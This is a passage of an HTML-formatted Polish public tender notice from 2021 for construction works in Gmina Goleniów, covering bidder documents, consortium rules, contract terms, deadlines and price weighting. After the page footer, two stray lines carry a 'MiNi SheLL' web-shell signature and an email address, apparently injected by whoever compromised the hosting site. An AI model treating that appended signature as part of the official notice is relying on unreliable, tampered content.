czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty- zgodnie z załącznikiem nr 5.2 do SWZ.<br/>W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jedno wspólne w/w oświadczenie.<br/>2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego,w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – zgodnie z załącznikiem nr 6.2 do SWZ.<br/>W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jedno wspólne w/w oświadczenie.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Poza podmiotowymi środkami dowodowymi na potwierdzenie podstaw do wykluczenia z postępowania i potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawca zobowiązany jest do złożenia wraz z ofertą ( zał. nr 1.1 do SWZ dla części nr 1 i zał. nr 1.2 do SWZ dla częsci nr 2) :<br/>1) w ramach części nr 1:<br/>a) formularz cenowy dla zamówienia z prawem opcji zgodnie z załącznikiem nr 1A do SWZ- jeżeli Wykonawca nie dołączy do oferty zał. nr 1A do SWZ jego oferta zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>b)	pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>c)	pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy);<br/>d)	zobowiązanie podmiotu udostępniającego zasoby Wykonawcy zgodnie z załącznikiem nr 7.1 do SWZ (jeżeli dotyczy);<br/>e)	oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnienie warunków udziału w postępowaniu – zgodnie z załącznikiem nr 4.1 do SWZ (jeżeli dotyczy);<br/>2) w ramach części nr 2:<br/>a)	formularz cenowy dla zamówienia z prawem opcji zgodnie z załącznikiem nr 1B do SWZ- jeżeli Wykonawca nie dołączy do oferty zał. nr 1B do SWZ jego oferta zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>b)	pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>c)	pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy);<br/>d)	zobowiązanie podmiotu udostępniającego zasoby Wykonawcy zgodnie z załącznikiem nr 7.2 do SWZ (jeżeli dotyczy);<br/>e)	oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnienie warunków udziału w postępowaniu – zgodnie z załącznikiem nr 4.2 do SWZ (jeżeli dotyczy); <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. Do oferty wspólnej Wykonawcy dołączają pełnomocnictwo.<br/>2.Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje informacje, korespondencję, itp. <br/>3.Oferta wspólna, składana przez dwóch lub więcej Wykonawców, powinna spełniać następujące wymagania: <br/>a)	oferta wspólna powinna być sporządzona zgodnie z SWZ, <br/>b)	sposób składania dokumentów w ofercie wspólnej:<br/> - dokumenty, dotyczące własnej firmy, takie jak np.: oświadczenie o braku podstaw do wykluczenia składa każdy z Wykonawców składających ofertę wspólną we własnym imieniu; <br/>- dokumenty wspólne takie jak np.: formularz ofertowy, dokumenty podmiotowe i przedmiotowe składa pełnomocnik Wykonawców w imieniu wszystkich Wykonawców składających ofertę wspólną. <br/>4. Przed podpisaniem umowy (w przypadku wygrania postępowania) Wykonawcy składający ofertę wspólną będą mieli obowiązek przedstawić Zamawiającemu umowę konsorcjum, zawierającą, co najmniej: <br/>a)	zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia, <br/>b)	określenie zakresu działania poszczególnych stron umowy, <br/>c) czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia oraz czas trwania gwarancji jakości i rękojmi.<br/>5 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki udziału w postępowaniu określone w pkt 13.2. SWZ powinni spełniać łącznie wszyscy Wykonawcy, z zastrzeżeniem, iż warunek określony w pkt 13.2.1.4 ppkt 1) SWZ dla części nr 1 oraz pkt 13.2.2.4 ppkt 1) SWZ dla części nr 2 winien spełniać co najmniej jeden z tych Wykonawców.<br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy wspólnie ubiegających się o udzielenie zamówienia mogą polegać na zdolnościach tych Wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane. W przypadku, o którym mowa w ppkt 13.2.1.4 SWZ dla części nr 1 oraz ppkt 13.2.2.4 dla części nr 2, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w formularzu ofertowym, stanowiącym załącznik nr 1.1 do SWZ dla części nr 1 oraz załączniku nr 1.2 do SWZ dla części nr 2 składają oświadczenie na podstawie art. 117 ust. 4 dotyczące robót budowlanych, które wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zostały określone w projektowanych postanowienia umowy, stanowiących załącznik nr 9.1 do SWZ w ramach części nr 1 oraz załącznik nr 9.2 do SWZ w ramach części nr 2. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-22 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy Przetargowej Gminy Goleniów https://goleniow.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-22 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający na podstawie art. 95 ustawy Prawo zamówień publicznych wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy (t.j. Dz. U. z 2019 r. poz. 1040, 1043, 1495).<br/>2.	Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub Podwykonawcę osób wykonujących wskazane poniżej czynności w trakcie realizacji zamówienia związane z:<br/>2.1. Dla części nr 1 i części nr 2:<br/><br/>a) obsługą sprzętu budowlanego;<br/>b) montaż instalacji elektrycznych (elektromonter).<br/><br/>3.Termin realizacji dla części nr 1:<br/>3.1.	zamówienia podstawowego: 160 dni od dnia podpisania umowy w sprawie zamówienia publicznego.<br/>3.2.	zamówienia objętego prawem opcji: 160 dni od dnia poinformowania Wykonawcy pismem lub oświadczeniem o uruchomieniu prawa opcji.<br/>4. Termin realizacji dla części nr 2:<br/>4.1.	zamówienia podstawowego: 160 dni od dnia podpisania umowy w sprawie zamówienia publicznego.<br/>4.2.	zamówienia objętego prawem opcji: 160 dni od dnia poinformowania Wykonawcy pismem lub oświadczeniem o uruchomieniu prawa opcji.<br/><br/>5. Uzupełnienie do sekcji IV punkt 4.3.5. ogłoszenia:<br/>5.1. Dla części nr 1 nazwa kryterium cena- waga 60,00 z tym ,że :<br/>a)	cena oferty za wykonanie zamówienia podstawowego (C1) – 40 pkt<br/>b)	cena oferty za wykonanie zamówienia objętego prawem opcji (C2)- 20 pkt<br/>5.2. Dla części nr 2 nazwa kryterium cena- waga 60,00 z tym ,że :<br/>a)	cena oferty za wykonanie zamówienia podstawowego (C1) – 35 pkt<br/>b)	cena oferty za wykonanie zamówienia objętego prawem opcji (C2)- 25 pkt</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-07 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com